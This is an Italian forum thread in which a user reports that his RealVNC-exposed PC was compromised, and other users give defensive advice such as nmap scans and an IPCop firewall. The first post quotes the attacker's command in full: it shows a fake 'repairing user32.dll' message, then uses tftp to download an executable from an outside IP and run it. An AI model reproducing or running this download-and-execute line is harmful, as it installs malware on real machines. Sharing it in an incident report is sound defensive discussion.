Logo by Irenicus lunedì 01-dic-08 15:48


RaulKen.It :: Leggi il Topic - RealVNC e le sue GRAVI falle di sicurezza.....
 FAQFAQ   CercaCerca   Gruppi utentiGruppi utenti   ProfiloProfilo   Messaggi PrivatiMessaggi Privati   LoginLogin 

RealVNC e le sue GRAVI falle di sicurezza.....

 
Nuovo Topic   Rispondi    Indice del forum -> Informatica Avanzata - Hacking e Sicurezza
Precedente :: Successivo  
Autore Messaggio
tR4DiNg
Nuovo del Forum
Nuovo del Forum


Registrato: Mar 29, 2007
Messaggi: 1

MessaggioInviato: Gio Mar 29, 2007 10:35 am    Oggetto: RealVNC e le sue GRAVI falle di sicurezza..... Rispondi citando

Vi descrivo la mia esperienza in proposito con questo programma.....Io ho la necessità di usarlo in quanto sto fuori casa quasi tutto il giorno e desidererei avere accesso remoto al mio pc in ogni istante....beh stamattina dopo ke il pc è rimasto acceso tutta la notte trovo 4 prompt di msdos aperti, il kaspersky ke affannato cercava di riparare i trojan trovati e sulla barra esegui questa riga di comando ....

%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET sskaml.exe & start sskaml&

Credo che qualcuno abbia tentato di bucare la mia shell pensando avessi qlk linea veloce x metterci su un server ftp o similari Gioia

Ora mi impressiona il fatto come il tizio abbia potuto bypassare la password di REALVNC (so che esistono dei tools ke lo fanno)....io d'altro canto posseggo la versione 4.0 di REALVNC ENTERPRISE (cioè la + aggiornata)....raga....come posso risolvere x evitare che mi entrino?
Ripeto ho necessità di avere accesso remoto sul mio pc e con ThightVNC non riuscivo a farlo andare col mio router....eppure sono dentro DMZ sullo stesso....
Oltre alla facile soluzione di mettere screensaver con password utente allo sblocco....come posso alternativamente risolvere?

Se ho omesso qualcosa o vi servono altre info x capire meglio il mio problema....fate reply....sono qui Gioia

CIAO E GRAZIE A TUTTI
Torna in cima
Profilo Messaggio privato
billiejoex
Nuovo del Forum
Nuovo del Forum


Registrato: Sep 08, 2004
Messaggi: 6

MessaggioInviato: Gio Mar 29, 2007 3:05 pm    Oggetto: Rispondi citando

Come fai a sapere che il problema è imputabile a VNC?
Torna in cima
Profilo Messaggio privato
claudiocrack
ExStaff


Registrato: set 21, 2001
Messaggi: 1574
Località: USA

MessaggioInviato: Sab Mar 31, 2007 4:31 pm    Oggetto: Rispondi citando

fatti un
nmap -sV ipdellatuaconnessionealprovider
o
nmap -P0 ipdellatuaconnessionealprovider
e posta il risultato.



purtroppo i vncinjection sono frequentissimi.
se non puoi fare a meno di usare vnc maschera la tua rete con un firewall fisico montati un piccolo firewall con ipcop con un vecchio pc da li "nascondi" il tuo ip chiudi il ping alla rete rossa quella del collegamento all' isp e mascheri il reindirizzamento delle porte e lo giri a un log del firewall cosi tieni sotto controllo chi prova a farti danni.


ciao ciao
Torna in cima
Profilo Messaggio privato Invia email
Mostra prima i messaggi di:   
Nuovo Topic   Rispondi    Indice del forum -> Informatica Avanzata - Hacking e Sicurezza Tutti i fusi orari sono GMT + 1 ora
Pagina 1 di 1

 
Vai a:  
Non puoi inserire nuovi Topic in questo forum
Non puoi rispondere ai Topic in questo forum
Non puoi modificare i tuoi messaggi in questo forum
Non puoi cancellare i tuoi messaggi in questo forum
Non puoi votare nei sondaggi in questo forum

Powered by phpBB © 2001, 2005 phpBB Group

 
© 1999-2008 by Hyarbor S.r.l. PI 04698901215 ®
Usando questo sito si accettano le Note Legali in termini di privacy.
PHP-Nuke Copyright © 2005 by Francisco Burzi. This is free software, and you may redistribute it under the GPL. PHP-Nuke comes with absolutely no warranty, for details, see the license.
Generazione pagina: 0.10 Secondi